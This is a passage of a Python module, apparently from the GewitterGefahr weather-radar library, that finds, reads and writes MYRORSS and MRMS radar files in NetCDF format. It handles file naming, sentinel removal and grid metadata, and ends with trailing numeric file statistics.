:param zipped: Boolean flag. If True, will generate name for zipped file.
If False, will generate name for unzipped file.
:return: pathless_raw_file_name: Pathless name for raw file.
"""
if zipped:
return '{0:s}{1:s}{2:s}'.format(
time_conversion.unix_sec_to_string(
unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION,
ZIPPED_FILE_EXTENSION
)
return '{0:s}{1:s}'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION
)
def _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name, sentinel_values):
"""Removes sentinel values from sparse grid.
:param sparse_grid_table: pandas DataFrame with columns produced by
`read_data_from_sparse_grid_file`.
:param field_name: Name of radar field in GewitterGefahr format.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: sparse_grid_table: Same as input, except that rows with a sentinel
value are removed.
"""
num_rows = len(sparse_grid_table.index)
sentinel_flags = numpy.full(num_rows, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
sparse_grid_table[field_name].values, this_sentinel_value,
atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
return sparse_grid_table.drop(
sparse_grid_table.index[sentinel_indices], axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
"""Removes sentinel values from full grid.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with radar field.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: field_matrix: Same as input, except that sentinel values are
replaced with NaN.
"""
num_grid_rows = field_matrix.shape[0]
num_grid_columns = field_matrix.shape[1]
num_grid_points = num_grid_rows * num_grid_columns
field_matrix = numpy.reshape(field_matrix, num_grid_points)
sentinel_flags = numpy.full(num_grid_points, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
field_matrix, this_sentinel_value, atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
field_matrix[sentinel_indices] = numpy.nan
return numpy.reshape(field_matrix, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
"""Generates relative path for raw files.
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param height_m_asl: Radar height (metres above sea level).
:return: relative_directory_name: Relative path for raw files.
"""
if field_name == radar_utils.REFL_NAME:
radar_utils.check_heights(
data_source=data_source, heights_m_asl=numpy.array([height_m_asl]),
field_name=radar_utils.REFL_NAME)
else:
height_m_asl = radar_utils.get_valid_heights(
data_source=data_source, field_name=field_name)[0]
return '{0:s}/{1:05.2f}'.format(
radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=data_source),
float(height_m_asl) * METRES_TO_KM
)
def find_raw_file(
unix_time_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, raise_error_if_missing=True):
"""Finds raw file.
File should contain one field at one time step (e.g., MESH at 123502 UTC,
reflectivity at 500 m above sea level and 123502 UTC).
:param unix_time_sec: Valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and file is missing,
this method will raise an error. If False and file is missing, will
return *expected* path to raw file.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if raise_error_if_missing = True and file is missing.
"""
# Error-checking.
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(raise_error_if_missing)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, height_m_asl=height_m_asl,
data_source=data_source)
directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name
)
pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
pathless_file_name = _get_pathless_raw_file_name(
unix_time_sec, zipped=False)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
raise ValueError(
'Cannot find raw file. Expected at: "{0:s}"'.format(raw_file_name)
)
return raw_file_name
def raw_file_name_to_time(raw_file_name):
"""Parses time from file name.
:param raw_file_name: Path to raw file.
:return: unix_time_sec: Valid time.
"""
error_checking.assert_is_string(raw_file_name)
_, time_string = os.path.split(raw_file_name)
time_string = time_string.replace(ZIPPED_FILE_EXTENSION, '').replace(
UNZIPPED_FILE_EXTENSION, '')
return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
desired_time_unix_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, max_time_offset_sec=None,
raise_error_if_missing=False):
"""Finds raw file at inexact time.
If you know the exact valid time, use `find_raw_file`.
:param desired_time_unix_sec: Desired valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Field name in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param max_time_offset_sec: Maximum offset between actual and desired valid
time.
For example, if `desired_time_unix_sec` is 162933 UTC 5 Jan 2018 and
`max_time_offset_sec` = 60, this method will look for az-shear at valid
times from 162833...163033 UTC 5 Jan 2018.
If None, this defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC` for
azimuthal-shear fields and `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC` for
all other fields.
:param raise_error_if_missing: Boolean flag. If no file is found and
raise_error_if_missing = True, this method will error out. If no file
is found and raise_error_if_missing = False, will return None.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if no file is found and raise_error_if_missing = True.
"""
# Error-checking.
error_checking.assert_is_integer(desired_time_unix_sec)
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_boolean(raise_error_if_missing)
radar_utils.check_field_name(field_name)
if max_time_offset_sec is None:
if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
else:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC
error_checking.assert_is_integer(max_time_offset_sec)
error_checking.assert_is_greater(max_time_offset_sec, 0)
first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec - max_time_offset_sec),
MINUTES_TO_SECONDS)))
last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec + max_time_offset_sec),
MINUTES_TO_SECONDS)))
allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=first_allowed_minute_unix_sec,
end_time_unix_sec=last_allowed_minute_unix_sec,
time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, data_source=data_source,
height_m_asl=height_m_asl)
raw_file_names = []
for this_time_unix_sec in allowed_minutes_unix_sec:
this_pathless_file_pattern = _get_pathless_raw_file_pattern(
this_time_unix_sec)
this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name, this_pathless_file_pattern
)
raw_file_names += glob.glob(this_file_pattern)
file_times_unix_sec = []
for this_raw_file_name in raw_file_names:
file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))
if len(file_times_unix_sec):
file_times_unix_sec = numpy.array(file_times_unix_sec)
time_differences_sec = numpy.absolute(
file_times_unix_sec - desired_time_unix_sec)
nearest_index = numpy.argmin(time_differences_sec)
min_time_diff_sec = time_differences_sec[nearest_index]
else:
min_time_diff_sec = numpy.inf
if min_time_diff_sec > max_time_offset_sec:
if raise_error_if_missing:
desired_time_string = time_conversion.unix_sec_to_string(
desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
error_string = (
'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
).format(field_name, max_time_offset_sec, desired_time_string)
raise ValueError(error_string)
return None
return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
spc_date_string, field_name, data_source, top_directory_name,
height_m_asl=None, raise_error_if_missing=True):
"""Finds raw files for one field and one SPC date.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and no files are
found, will raise error.
:return: raw_file_names: 1-D list of paths to raw files.
:raises: ValueError: if raise_error_if_missing = True and no files are
found.
"""
error_checking.assert_is_boolean(raise_error_if_missing)
example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
spc_date_string)
example_file_name = find_raw_file(
unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
field_name=field_name, data_source=data_source,
top_directory_name=top_directory_name, height_m_asl=height_m_asl,
raise_error_if_missing=False)
example_directory_name, example_pathless_file_name = os.path.split(
example_file_name)
example_time_string = time_conversion.unix_sec_to_string(
example_time_unix_sec, TIME_FORMAT_SECONDS)
pathless_file_pattern = example_pathless_file_name.replace(
example_time_string, TIME_FORMAT_SECONDS_REGEX)
pathless_file_pattern = pathless_file_pattern.replace(
ZIPPED_FILE_EXTENSION, '*')
raw_file_pattern = '{0:s}/{1:s}'.format(
example_directory_name, pathless_file_pattern)
raw_file_names = glob.glob(raw_file_pattern)
if raise_error_if_missing and not raw_file_names:
error_string = (
'Could not find any files with the following pattern: {0:s}'
).format(raw_file_pattern)
raise ValueError(error_string)
return raw_file_names
def find_many_raw_files(
desired_times_unix_sec, spc_date_strings, data_source, field_names,
top_directory_name, reflectivity_heights_m_asl=None,
max_time_offset_for_az_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
max_time_offset_for_non_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
"""Finds raw file for each field/height pair and time step.
N = number of input times
T = number of unique input times
F = number of field/height pairs
:param desired_times_unix_sec: length-N numpy array with desired valid
times.
:param spc_date_strings: length-N list of corresponding SPC dates (format
"yyyymmdd").
:param data_source: Data source ("myrorss" or "mrms").
:param field_names: 1-D list of field names.
:param top_directory_name: Name of top-level directory with radar data from
the given source.
:param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
sea level) for the field "reflectivity_dbz". If "reflectivity_dbz" is
not in `field_names`, leave this as None.
:param max_time_offset_for_az_shear_sec: Max time offset (between desired
and actual valid time) for azimuthal-shear fields.
:param max_time_offset_for_non_shear_sec: Max time offset (between desired
and actual valid time) for non-azimuthal-shear fields.
:return: file_dictionary: Dictionary with the following keys.
file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
raw files.
file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
valid times.
file_dictionary['spc_date_strings_for_unique_times']: length-T numpy array
of corresponding SPC dates.
file_dictionary['field_name_by_pair']: length-F list of field names.
file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
(metres above sea level).
"""
field_name_by_pair, height_by_pair_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
field_names=field_names, data_source=data_source,
refl_heights_m_asl=reflectivity_heights_m_asl)
)
num_fields = len(field_name_by_pair)
error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
error_checking.assert_is_numpy_array(
desired_times_unix_sec, num_dimensions=1)
num_times = len(desired_times_unix_sec)
error_checking.assert_is_string_list(spc_date_strings)
error_checking.assert_is_numpy_array(
numpy.array(spc_date_strings),
exact_dimensions=numpy.array([num_times]))
spc_dates_unix_sec = numpy.array(
[time_conversion.spc_date_string_to_unix_sec(s)
for s in spc_date_strings])
time_matrix = numpy.hstack((
numpy.reshape(desired_times_unix_sec, (num_times, 1)),
numpy.reshape(spc_dates_unix_sec, (num_times, 1))
))
unique_time_matrix = numpy.vstack(
{tuple(this_row) for this_row in time_matrix}
).astype(int)
unique_times_unix_sec = unique_time_matrix[:, 0]
spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]
sort_indices = numpy.argsort(unique_times_unix_sec)
unique_times_unix_sec = unique_times_unix_sec[sort_indices]
spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
sort_indices]
num_unique_times = len(unique_times_unix_sec)
radar_file_name_matrix = numpy.full(
(num_unique_times, num_fields), '', dtype=object)
for i in range(num_unique_times):
this_spc_date_string = time_conversion.time_to_spc_date_string(
spc_dates_at_unique_times_unix_sec[i])
for j in range(num_fields):
if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
this_max_time_offset_sec = max_time_offset_for_az_shear_sec
this_raise_error_flag = False
else:
this_max_time_offset_sec = max_time_offset_for_non_shear_sec
this_raise_error_flag = True
if this_max_time_offset_sec == 0:
radar_file_name_matrix[i, j] = find_raw_file(
unix_time_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
raise_error_if_missing=this_raise_error_flag)
else:
radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
desired_time_unix_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
max_time_offset_sec=this_max_time_offset_sec,
raise_error_if_missing=this_raise_error_flag)
if radar_file_name_matrix[i, j] is None:
this_time_string = time_conversion.unix_sec_to_string(
unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)
warning_string = (
'Cannot find file for "{0:s}" at {1:d} metres ASL and '
'{2:s}.'
).format(
field_name_by_pair[j], int(height_by_pair_m_asl[j]),
this_time_string
)
warnings.warn(warning_string)
return {
RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
UNIQUE_TIMES_KEY: unique_times_unix_sec,
SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
}
def read_metadata_from_raw_file(
netcdf_file_name, data_source, raise_error_if_fails=True):
"""Reads metadata from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param data_source: Data source (string).
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: metadata_dict: Dictionary with the following keys.
metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of northwesternmost
grid point.
metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
northwesternmost grid point.
metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
adjacent grid points.
metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
grid points.
metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
latitudes).
metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
longitudes).
metadata_dict['height_m_asl']: Radar height (metres above ground level).
metadata_dict['unix_time_sec']: Valid time.
metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
metadata_dict['field_name_orig']: Name of radar field in original (either
MYRORSS or MRMS) format.
metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))
metadata_dict = {
radar_utils.NW_GRID_POINT_LAT_COLUMN:
getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
radar_utils.NW_GRID_POINT_LNG_COLUMN:
lng_conversion.convert_lng_positive_in_west(
getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
allow_nan=False),
radar_utils.LAT_SPACING_COLUMN:
getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
radar_utils.LNG_SPACING_COLUMN:
getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
radar_utils.NUM_LAT_COLUMN:
netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
radar_utils.NUM_LNG_COLUMN:
netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
radar_utils.HEIGHT_COLUMN:
getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
radar_utils.UNIX_TIME_COLUMN:
getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
FIELD_NAME_COLUMN_ORIG: field_name_orig,
radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
}
latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]
# TODO(thunderhoser): The following "if" condition is a hack. The purpose
# is to change grid corners only for actual MYRORSS data, not GridRad data
# in MYRORSS format.
if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
rounder.floor_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
rounder.ceiling_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
metadata_dict[radar_utils.LNG_SPACING_COLUMN]))
sentinel_values = []
for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
sentinel_values.append(getattr(netcdf_dataset, this_column))
metadata_dict.update({
radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
netcdf_dataset.close()
return metadata_dict
def read_data_from_sparse_grid_file(
netcdf_file_name, field_name_orig, data_source, sentinel_values,
raise_error_if_fails=True):
"""Reads sparse radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param field_name_orig: Name of radar field in original (either MYRORSS or
MRMS) format.
:param data_source: Data source (string).
:param sentinel_values: 1-D numpy array of sentinel values.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: sparse_grid_table: pandas DataFrame with the following columns.
Each row corresponds to one grid point.
sparse_grid_table.grid_row: Row index.
sparse_grid_table.grid_column: Column index.
sparse_grid_table.<field_name>: Radar measurement (column name is produced
by _field_name_orig_to_new).
sparse_grid_table.num_grid_cells: Number of consecutive grid points with the
same radar measurement. Counting is row-major (to the right along the
row, then down to the next column if necessary).
"""
error_checking.assert_file_exists(netcdf_file_name)
error_checking.assert_is_numpy_array_without_nan(sentinel_values)
error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name = radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
num_values = len(netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG])
if num_values == 0:
sparse_grid_dict = {
GRID_ROW_COLUMN: numpy.array([], dtype=int),
GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
field_name: numpy.array([])}
else:
sparse_grid_dict = {
GRID_ROW_COLUMN: netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:],
GRID_COLUMN_COLUMN:
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:],
NUM_GRID_CELL_COLUMN:
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
field_name: netcdf_dataset.variables[field_name_orig][:]}
netcdf_dataset.close()
sparse_grid_table = pandas.DataFrame.from_dict(sparse_grid_dict)
return _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name=field_name,
sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
netcdf_file_name, metadata_dict, raise_error_if_fails=True):
"""Reads full radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None for all output vars.
:return: field_matrix: M-by-N numpy array with radar field. Latitude
increases while moving up each column, and longitude increases while
moving right along each row.
:return: grid_point_latitudes_deg: length-M numpy array of grid-point
latitudes (deg N). This array is monotonically decreasing.
:return: grid_point_longitudes_deg: length-N numpy array of grid-point
longitudes (deg E). This array is monotonically increasing.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None, None, None
field_matrix = netcdf_dataset.variables[
metadata_dict[FIELD_NAME_COLUMN_ORIG]]
netcdf_dataset.close()
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
grid_point_latitudes_deg, grid_point_longitudes_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
field_matrix = _remove_sentinels_from_full_grid(
field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])
return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
grid_point_longitudes_deg)
def write_field_to_myrorss_file(
field_matrix, netcdf_file_name, field_name, metadata_dict,
height_m_asl=None):
"""Writes field to MYRORSS-formatted file.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with one radar variable at one time.
Latitude should increase down each column, and longitude should increase
to the right along each row.
:param netcdf_file_name: Path to output file.
:param field_name: Name of radar field in GewitterGefahr format.
:param metadata_dict: Dictionary created by either
`gridrad_io.read_metadata_from_full_grid_file` or
`read_metadata_from_raw_file`.
:param height_m_asl: Height of radar field (metres above sea level).
"""
if field_name == radar_utils.REFL_NAME:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID,
refl_heights_m_asl=numpy.array([height_m_asl])))
else:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID))
field_name = list(field_to_heights_dict_m_asl.keys())[0]
radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]
if field_name in radar_utils.ECHO_TOP_NAMES:
field_matrix = METRES_TO_KM * field_matrix
field_name_myrorss = radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
netcdf_dataset.setncattr(
FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
netcdf_dataset.setncattr(
NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
HEIGHT_COLUMN_ORIG,
METRES_TO_KM * numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr(
UNIX_TIME_COLUMN_ORIG,
numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
netcdf_dataset.setncattr('FractionalTime', 0.)
netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
netcdf_dataset.setncattr('ColorMap-value', '')
netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
netcdf_dataset.setncattr('SubType-value', numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
netcdf_dataset.setncattr('Unit-value', 'dimensionless')
netcdf_dataset.setncattr(
LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LAT_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LNG_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
(metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
num_grid_rows = len(unique_grid_point_lats_deg)
num_grid_columns = len(unique_grid_point_lngs_deg)
field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)
grid_point_lat_matrix, grid_point_lng_matrix = (
grids.latlng_vectors_to_matrices(
unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
grid_point_lat_vector = numpy.reshape(
grid_point_lat_matrix, num_grid_rows * num_grid_columns)
grid_point_lng_vector = numpy.reshape(
grid_point_lng_matrix, num_grid_rows * num_grid_columns)
real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]
netcdf_dataset.createDimension(
NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
netcdf_dataset.createDimension(
NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
netcdf_dataset.createDimension(
NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))
row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
grid_point_lat_vector, grid_point_lng_vector,
nw_grid_point_lat_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
nw_grid_point_lng_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])
netcdf_dataset.createVariable(
field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'BackgroundValue', numpy.int32(-99900))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'units', 'dimensionless')
netcdf_dataset.variables[field_name_myrorss].setncattr(
'NumValidRuns', numpy.int32(len(real_value_indices)))
netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
real_value_indices]
netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
row_index_vector[real_value_indices])
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
column_index_vector[real_value_indices])
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
numpy.full(len(real_value_indices), 1, dtype=int))
netcdf_dataset.close()
| 42.365854
| 80
| 0.731041
| 5,447
| 38,214
| 4.69139
| 0.07729
| 0.030289
| 0.023284
| 0.030132
| 0.650231
| 0.531619
| 0.463724
| 0.418486
| 0.366322
| 0.326955
| 0
| 0.006491
| 0.197781
| 38,214
| 901
| 81
| 42.412875
| 0.827081
| 0.26506
| 0
| 0.240672
| 0
| 0.005597
| 0.036817
| 0.007334
| 0
| 0
| 0
| 0.00111
| 0.031716
| 1
